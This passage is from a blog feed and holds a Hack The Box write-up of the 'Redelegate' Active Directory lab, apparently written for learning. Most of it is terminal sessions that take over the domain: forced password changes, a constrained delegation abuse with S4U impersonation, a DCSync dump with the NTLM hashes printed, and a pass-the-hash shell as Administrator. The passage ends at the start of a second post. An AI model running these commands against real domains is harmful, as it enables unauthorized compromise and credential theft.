data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a22a65f6-5084-42b4-90b3-160708767b98_1922x912.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:912,&quot;width&quot;:1922,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:190474,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193146643?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F901c527d-927c-46a3-92c9-8e4c239e7b4f_1922x912.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!zL3E!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa22a65f6-5084-42b4-90b3-160708767b98_1922x912.png 424w, https://substackcdn.com/image/fetch/$s_!zL3E!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa22a65f6-5084-42b4-90b3-160708767b98_1922x912.png 848w, https://substackcdn.com/image/fetch/$s_!zL3E!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa22a65f6-5084-42b4-90b3-160708767b98_1922x912.png 1272w, https://substackcdn.com/image/fetch/$s_!zL3E!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa22a65f6-5084-42b4-90b3-160708767b98_1922x912.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>With-out being said, this is our path:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!5QkC!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2a08321b-5ca1-488b-834a-de35132f4426_1922x912.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!5QkC!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2a08321b-5ca1-488b-834a-de35132f4426_1922x912.png 424w, https://substackcdn.com/image/fetch/$s_!5QkC!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2a08321b-5ca1-488b-834a-de35132f4426_1922x912.png 848w, https://substackcdn.com/image/fetch/$s_!5QkC!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2a08321b-5ca1-488b-834a-de35132f4426_1922x912.png 1272w, https://substackcdn.com/image/fetch/$s_!5QkC!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2a08321b-5ca1-488b-834a-de35132f4426_1922x912.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!5QkC!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2a08321b-5ca1-488b-834a-de35132f4426_1922x912.png" width="1456" height="691" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/2a08321b-5ca1-488b-834a-de35132f4426_1922x912.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:691,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:196690,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193146643?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2a08321b-5ca1-488b-834a-de35132f4426_1922x912.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!5QkC!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2a08321b-5ca1-488b-834a-de35132f4426_1922x912.png 424w, https://substackcdn.com/image/fetch/$s_!5QkC!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2a08321b-5ca1-488b-834a-de35132f4426_1922x912.png 848w, https://substackcdn.com/image/fetch/$s_!5QkC!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2a08321b-5ca1-488b-834a-de35132f4426_1922x912.png 1272w, https://substackcdn.com/image/fetch/$s_!5QkC!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2a08321b-5ca1-488b-834a-de35132f4426_1922x912.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><ol start="6"><li><p><em>Object Password Changes</em></p></li></ol><p>Let&#8217;s change password</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec smb dc.redelegate.vl -u Marie.Curie -p 'Fall2024!' -M change-password -o USER=Helen.Frost NEWPASS=passw0rd1                                                                                                              
SMB         10.129.194.125  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.194.125  445    DC               [+] redelegate.vl\Marie.Curie:Fall2024! 
CHANGE-P... 10.129.194.125  445    DC               [+] Successfully changed password for Helen.Frost

&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec smb dc.redelegate.vl -u helen.frost -p passw0rd1
SMB         10.129.194.125  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.194.125  445    DC               [+] redelegate.vl\helen.frost:passw0rd1</code></pre></div><p>Great, now we can hunt delegations path-ways to Admin!</p><ol start="7"><li><p><em>Constrained Delegation</em></p></li></ol><p>After further enumeration, we got MachineAccountQuota of 0, meaning we try another delegations, but RBCD wouldn&#8217;t be possible due to SeEnableDelegationPrivilege in not enabled.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec ldap dc.redelegate.vl -u helen.frost -p passw0rd1                                                                                                                                                                          
LDAP        10.129.194.125  389    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:redelegate.vl) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.194.125  389    DC               [+] redelegate.vl\helen.frost:passw0rd1 

&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec ldap dc.redelegate.vl -u helen.frost -p passw0rd1 -M maq
LDAP        10.129.194.125  389    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:redelegate.vl) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.194.125  389    DC               [+] redelegate.vl\helen.frost:passw0rd1 
MAQ         10.129.194.125  389    DC               [*] Getting the MachineAccountQuota
MAQ         10.129.194.125  389    DC               MachineAccountQuota: 0</code></pre></div><h3>Delegations</h3><ul><li><p>Unconstrained delegation: A machine can store a TGT for any user that connects, and use it to authenticate as that user. Configured by setting <code>TRUSTED_FOR_DELEGATION</code> in <code>userAccountControl</code> (requires SeEnableDelegationPrivilege).</p></li><li><p>Constrained delegation: A machine can impersonate a user, but only to specific services. Set <code>TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION</code> and define allowed targets in <code>msDS-AllowedToDelegateTo</code> (requires SeEnableDelegationPrivilege).</p></li><li><p>RBCD: The target machine decides who can delegate to it. Configured via <code>msDS-AllowedToActOnBehalfOfOtherIdentity</code>.</p></li></ul><p>One again RBCD isn&#8217;t really relevant given the privilege here.</p><p>So this is our attack paths for Constrained delegations, but some objects needs to be edited:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ sudo faketime "$(ntpdate -q DC | cut -d ' ' -f 1,2)" impacket-getTGT redelegate.vl/helen.frost:passw0rd1                                                                                                                       
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in helen.frost.ccache

&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ export KRB5CCNAME=helen.frost.ccache</code></pre></div><p>Then change the Computer (FS01) password:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ sudo faketime "$(ntpdate -q DC | cut -d ' ' -f 1,2)" bloodyAD -k --host dc.redelegate.vl set password 'FS01$' passw0rd2                                                                                                                 
[+] Password changed successfully!</code></pre></div><p>Then we change the object to make &#8220;AllowedToDelegate&#8220; enabled:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ sudo faketime "$(ntpdate -q DC | cut -d ' ' -f 1,2)" bloodyAD -d redelegate.vl -k --host dc.redelegate.vl add uac 'FS01$' -f TRUSTED_TO_AUTH_FOR_DELEGATION                                                                            
[-] ['TRUSTED_TO_AUTH_FOR_DELEGATION'] property flags added to FS01$'s userAccountControl

&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ sudo faketime "$(ntpdate -q DC | cut -d ' ' -f 1,2)" bloodyAD -d redelegate.vl -k --host dc.redelegate.vl set object 'FS01$' msDS-AllowedToDelegateTo -v cifs/dc.redelegate.vl
[+] FS01$'s msDS-AllowedToDelegateTo has been updated</code></pre></div><p>Then we asked for the new Computers ticket</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ sudo faketime "$(ntpdate -q DC | cut -d ' ' -f 1,2)" impacket-getTGT redelegate.vl/'FS01$:passw0rd2'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in FS01$.ccache

&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ export KRB5CCNAME='FS01$.ccache'</code></pre></div><p>And finally we can impersonate the DC with this ticket:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ klist                                                                                                                                                                                                                                   
Ticket cache: FILE:FS01$.ccache
Default principal: FS01$@REDELEGATE.VL

Valid starting       Expires              Service principal
04/04/2026 04:01:14  04/04/2026 14:01:14  krbtgt/REDELEGATE.VL@REDELEGATE.VL
        renew until 04/05/2026 04:01:13</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ sudo faketime "$(ntpdate -q DC | cut -d ' ' -f 1,2)" impacket-getST -k -no-pass -spn cifs/dc.redelegate.vl -impersonate DC redelegate.vl/'FS01$'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Impersonating DC
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in DC@cifs_dc.redelegate.vl@REDELEGATE.VL.ccache

&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ export KRB5CCNAME=DC@cifs_dc.redelegate.vl@REDELEGATE.VL.ccache</code></pre></div><p>And we&#8217;re now the DC:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ klist                                                                                                                                                                                                                                   
Ticket cache: FILE:DC@cifs_dc.redelegate.vl@REDELEGATE.VL.ccache
Default principal: DC@redelegate.vl

Valid starting       Expires              Service principal
04/04/2026 04:02:02  04/04/2026 14:01:14  cifs/dc.redelegate.vl@REDELEGATE.VL
        renew until 04/05/2026 04:01:13</code></pre></div><ol start="8"><li><p><em>DCSync Attack and Logon as Administrator</em></p></li></ol><p>With that we can just DCSycn:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ sudo faketime "$(ntpdate -q DC | cut -d ' ' -f 1,2)" netexec smb dc.redelegate.vl --use-kcache --ntds                                                                                                                                   
SMB         dc.redelegate.vl 445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         dc.redelegate.vl 445    DC               [+] redelegate.vl\DC from ccache 
SMB         dc.redelegate.vl 445    DC               [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         dc.redelegate.vl 445    DC               Administrator:500:aad3b435b51404eeaad3b435b51404ee:ec17f7a2a4d96e177bfd101b94ffc0a7:::
SMB         dc.redelegate.vl 445    DC               Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         dc.redelegate.vl 445    DC               krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9288173d697316c718bb0f386046b102:::
SMB         dc.redelegate.vl 445    DC               Christine.Flanders:1104:aad3b435b51404eeaad3b435b51404ee:79581ad15ded4b9f3457dbfc35748ccf:::
SMB         dc.redelegate.vl 445    DC               Marie.Curie:1105:aad3b435b51404eeaad3b435b51404ee:a4bc00e2a5edcec18bd6266e6c47d455:::
SMB         dc.redelegate.vl 445    DC               Helen.Frost:1106:aad3b435b51404eeaad3b435b51404ee:798a21df6df33f3b2cf9eeb2adc99fef:::
SMB         dc.redelegate.vl 445    DC               Michael.Pontiac:1107:aad3b435b51404eeaad3b435b51404ee:f37d004253f5f7525ef9840b43e5dad2:::
SMB         dc.redelegate.vl 445    DC               Mallory.Roberts:1108:aad3b435b51404eeaad3b435b51404ee:980634f9aabfe13aec0111f64bda50c9:::
SMB         dc.redelegate.vl 445    DC               James.Dinkleberg:1109:aad3b435b51404eeaad3b435b51404ee:2716d39cc76e785bd445ca353714854d:::
SMB         dc.redelegate.vl 445    DC               Ryan.Cooper:1117:aad3b435b51404eeaad3b435b51404ee:062a12325a99a9da55f5070bf9c6fd2a:::
SMB         dc.redelegate.vl 445    DC               sql_svc:1119:aad3b435b51404eeaad3b435b51404ee:76a96946d9b465ec76a4b0b316785d6b:::
SMB         dc.redelegate.vl 445    DC               DC$:1002:aad3b435b51404eeaad3b435b51404ee:bfdff77d74764b0d4f940b7e9f684a61:::
SMB         dc.redelegate.vl 445    DC               FS01$:1103:aad3b435b51404eeaad3b435b51404ee:9f3091c0127448716fd54ba4fa078db4:::
SMB         dc.redelegate.vl 445    DC               [+] Dumped 13 NTDS hashes to /root/.nxc/logs/ntds/DC_dc.redelegate.vl_2026-04-04_040319.ntds of which 11 were added to the database
SMB         dc.redelegate.vl 445    DC               [*] To extract only enabled accounts from the output file, run the following command: 
SMB         dc.redelegate.vl 445    DC               [*] grep -iv disabled /root/.nxc/logs/ntds/DC_dc.redelegate.vl_2026-04-04_040319.ntds | cut -d ':' -f1</code></pre></div><p>And logon as Administrator:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ wmiexec.py administrator@dc -hashes :ec17f7a2a4d96e177bfd101b94ffc0a7
Impacket v0.14.0.dev0+20260306.165346.8c155a5b - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\&gt;whoami
redelegate\administrator

C:\&gt;hostname
dc</code></pre></div><p>OR</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ wmiexec.py administrator@dc -k -no-pass
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\&gt;whoami
redelegate\administrator</code></pre></div><p>That&#8217;s it!!</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!3qRK!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2d14ee24-d195-4499-86ce-2c7e437a5827_880x370.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!3qRK!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2d14ee24-d195-4499-86ce-2c7e437a5827_880x370.png 424w, https://substackcdn.com/image/fetch/$s_!3qRK!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2d14ee24-d195-4499-86ce-2c7e437a5827_880x370.png 848w, https://substackcdn.com/image/fetch/$s_!3qRK!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2d14ee24-d195-4499-86ce-2c7e437a5827_880x370.png 1272w, https://substackcdn.com/image/fetch/$s_!3qRK!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2d14ee24-d195-4499-86ce-2c7e437a5827_880x370.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!3qRK!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2d14ee24-d195-4499-86ce-2c7e437a5827_880x370.png" width="880" height="370" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/2d14ee24-d195-4499-86ce-2c7e437a5827_880x370.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:370,&quot;width&quot;:880,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:88843,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193146643?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2d14ee24-d195-4499-86ce-2c7e437a5827_880x370.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!3qRK!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2d14ee24-d195-4499-86ce-2c7e437a5827_880x370.png 424w, https://substackcdn.com/image/fetch/$s_!3qRK!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2d14ee24-d195-4499-86ce-2c7e437a5827_880x370.png 848w, https://substackcdn.com/image/fetch/$s_!3qRK!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2d14ee24-d195-4499-86ce-2c7e437a5827_880x370.png 1272w, https://substackcdn.com/image/fetch/$s_!3qRK!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2d14ee24-d195-4499-86ce-2c7e437a5827_880x370.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><ul><li><p><a href="https://labs.hackthebox.com/achievement/machine/2489228/681">labs.hackthebox.com/achievement/machine/2489228/681</a></p></li></ul><p>Until next time and Happy Hacking!</p><ul><li><p><a href="https://github.com/byt3n33dl3">GitHub</a></p></li><li><p><a href="mailto:byt3n33dl3@proton.me">Mail</a></p></li></ul>]]></content:encoded></item><item><title><![CDATA[HTB Data - Linux (Easy)]]></title><description><![CDATA[Access Web with Grafana based version 8 which is vulnerable to path traversal leading to database and takeover account of local users, BloodPengu for abuse path and discover vulnerable mount service.]]></description><link>https://byt3n33dl3.substack.com/p/htb-data-linux-easy</link><guid isPermaLink="false">https://byt3n33dl3.substack.com/p/htb-data-linux-easy</guid><dc:creator><![CDATA[Sulaiman]]></dc:creator><pubDate>Mon, 27 Apr 2026 13:49:12 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!OqHb!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb637d1d1-0962-4201-a8a4-9f119b74ed2e_712x526.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!OqHb!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb637d1d1-0962-4201-a8a4-9f119b74ed2e_712x526.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!OqHb!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb637d1d1-0962-4201-a8a4-9f119b74ed2e_712x526.png 424w, https://substackcdn.com/image/fetch/$s_!OqHb!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb637d1d1-0962-4201-a8a4-9f119b74ed2e_712x526.png 848w, https://substackcdn.com/image/fetch/$s_!OqHb!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb637d1d1-0962-4201-a8a4-9f119b74ed2e_712x526.png 1272w, 